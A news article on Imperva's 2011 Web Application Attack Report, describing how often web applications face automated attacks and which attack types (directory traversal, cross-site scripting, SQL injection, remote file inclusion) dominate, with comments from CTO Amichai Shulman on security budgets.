Automated Web attacks are prevailing with Web applications being attacked or probed 27 times per hour, on average, according to new research. At the height of these attacks,
This is a clear and present danger. Attackers are going after applications all the time, yet even today most security budgets are focused on network and infrastructure security.
Amichai Shulman, CTO and co-founder, Imperva Inc.
The data was gathered over a 6-month period by Redwood Shores, Calif.-based data security vendor Imperva Inc. sheds light on the proliferation of automated attack toolkits. The company’s Web Application Attack Report (.pdf) was the result of an analysis conducted by its Application Defense Center (ADC) team, which observed attacks from 30 different applications from December 2010 to May 2011. ADC monitored over 10 million individual attacks, focusing on specific incidents to determine trends and general conclusions about automated Web attacks.
“We’ve seen reports that identify attacks, but those were mainly concerned with malware, phishing, spam or network attacks, nothing that is related to the application,” said Amichai Shulman, CTO and co-founder of Imperva, as well as lead researcher for ADC. “The question we wanted to answer is, ‘What are the vulnerabilities attackers are trying to exploit?’”
The “Unfab Four,” as the report labels them, are the four dominant attacks that comprise the vast majority of attacks targeting Web applications: directory traversal, cross-site scripting, SQL injection and remote file inclusion (RFI). Directory traversal and cross-site scripting were the most widely used attacks, making up almost 75% of all attack traffic.
Organizations need to focus more security on the application layer where the majority of attacks are taking place, Shulman said. The report explains that attackers target Web applications to steal data and make a profit. Therefore, automation – the use of automated attack toolkits – is prevailing because of it. Even if hackers don’t see incredible success rates, at the end of the day, they earn some money, explains Shulman. “With automation, you don’t have to do much to still see results.”
Most of these automated attacks consist of two phases, scanning and exploiting. Many attackers often use different attacks for each phase, using one to probe and scan and another to actually exploit if probing and scanning was successful. This combination of attacks provides the most value and is very easy to automate.
“Directory traversal and RFI have a high degree of correlation between them,” Shulman said. “It looks as though the attacker is trying to map out the internal structure of the server with directory traversal, and then with that information, launching an RFI attack [to exploit].”
According to the report, the attack traffic was characterized by short peaks of high activity followed by longer periods of lighter activity. Shulman explained that during lighter activity, attackers are obtaining all potential targets. The high activity represents the launching against those targets.
One of the key findings of the report is there is no correlation between the popularity of the site and why the site was targeted. The hacker launching the attack doesn’t care if it’s a high-profile or low-profile attack. “If it’s out there and it’s on the list, which is obtained through search engines, then you’ll be attacked,” Shulman said. “Whatever they succeed in compromising they’ll make use of.”
The report also explained that most of the monitored attacks came from within the United States. This is because the Web applications monitored are from the U.S. and it’s more effective for attackers to use machines originating from the same country as the target.
“We have seen huge numbers of application attacks being launched on a day-to-day basis,” Shulman said. “This is a clear and present danger. Attackers are going after applications all the time, yet even today most security budgets are focused on network and infrastructure security. So, clearly, there’s an imbalance of where the risk is and where the budget is. That’s one of the key items people should take from this report.”